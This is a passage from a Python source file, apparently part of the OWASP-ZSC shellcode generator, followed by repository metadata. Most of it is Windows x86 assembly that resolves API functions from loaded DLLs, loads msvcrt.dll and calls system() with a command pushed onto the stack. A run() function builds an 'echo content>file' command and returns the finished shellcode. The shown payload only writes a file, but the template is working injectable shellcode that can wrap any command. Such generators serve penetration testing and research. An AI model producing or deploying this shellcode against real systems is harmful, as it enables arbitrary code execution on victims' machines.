cmpl $0x41636f72,0x4(%eax)
jne 23 <.text+0x23>
cmpl $0x65726464,0x8(%eax)
jne 23 <.text+0x23>
mov 0x24(%edx),%esi
add %ebx,%esi
mov (%esi,%ecx,2),%cx
dec %ecx
mov 0x1c(%edx),%esi
add %ebx,%esi
mov (%esi,%ecx,4),%edx
add %ebx,%edx
xor %esi,%esi
mov %edx,%esi
xor %ecx,%ecx
push %ecx
push $0x41797261
push $0x7262694c
push $0x64616f4c
push %esp
push %ebx
call *%edx
xor %ecx,%ecx
mov $0x6c6c,%cx
push %ecx
push $0x642e7472
push $0x6376736d
push %esp
call *%eax
xor %edi,%edi
mov %eax,%edi
xor %edx,%edx
push %edx
mov $0x6d65,%dx
push %edx
push $0x74737973
mov %esp,%ecx
push %ecx
push %edi
xor %edx,%edx
mov %esi,%edx
call *%edx
xor %ecx,%ecx
{cmd}
push %esp
call *%eax
xor %edx,%edx
push %edx
push $0x74697865
mov %esp,%ecx
push %ecx
push %edi
call *%esi
xor %ecx,%ecx
push %ecx
call *%eax
'''
    return template.format(cmd=create_command)
def run(data):
    """ZSC entry point for the Windows x86 create-file payload.

    *data* is a two-item sequence: data[0] is the target file name and
    data[1] is the text to write into it.  Builds an ``echo content>file``
    shell command, encodes it as stack-push assembly via
    ``stack.generate`` and returns the full shellcode from
    :func:`create_file`.
    """
    target_file = data[0]
    content = data[1]
    # cmd.exe redirection: "echo <content>><file>" writes content to file.
    shell_command = "echo {0}>{1}".format(content, target_file)
    return create_file(stack.generate(shell_command, "%ecx", "string"))
| Ali-Razmjoo/OWASP-ZSC | lib/generator/windows_x86/create_file.py | Python | gpl-3.0 | 1,892 | 0.000529 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.